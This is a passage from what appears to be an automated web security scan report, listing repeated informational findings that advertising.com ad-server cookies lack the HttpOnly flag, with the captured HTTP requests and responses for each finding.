<h2>Object moved to <a href="http://bit.ly/n8AAWP">here</a>.</h2>
</body></html>

12.132. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13141172/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=13141172/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=13141172/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=11415325&rk1=4961111&rk2=1316239725.757&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:07:20 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:07:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:07:20 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

12.133. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13161297/hr=1/hl=11/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CBottom%2526page%253Dbh.heraldinteractive.com%25252F%252Fyour_tax_dollars_at_work  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=13161297/hr=1/hl=11/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CBottom%2526page%253Dbh.heraldinteractive.com%25252F%252Fyour_tax_dollars_at_work

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=13161297/hr=1/hl=11/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CBottom%2526page%253Dbh.heraldinteractive.com%25252F%252Fyour_tax_dollars_at_work HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:05:40 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:05:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:05:40 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

12.134. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13485129/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=13485129/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=13485129/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=1334983&rk1=82780216&rk2=1316239456.072&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:02:51 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:02:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:02:51 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

12.135. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=14907432/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=14907432/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=14907432/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38185087&rk1=62469548&rk2=1316239584.729&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:05:00 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:05:00 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:05:00 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

12.136. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=39615410/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=39615410/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=39615410/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71482072&rk1=45911150&rk2=1316239536.305&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:04:10 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:04:10 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:04:10 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

12.137. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=4347768/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=4347768/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=4347768/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=20562183&rk1=63496433&rk2=1316239504.461&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:03:39 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:03:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:03:39 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

12.138. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=71688841/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=71688841/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=71688841/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:06:58 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:06:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:06:58 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

12.139. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=73068085/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=73068085/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=73068085/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=54474395&rk1=24255064&rk2=1316239663.519&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:06:18 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:06:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:06:18 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

12.140. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=87670031/hr=1/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753542/size=728090/u=2/bnum=87670031/hr=1/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753542/size=728090/u=2/bnum=87670031/hr=1/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
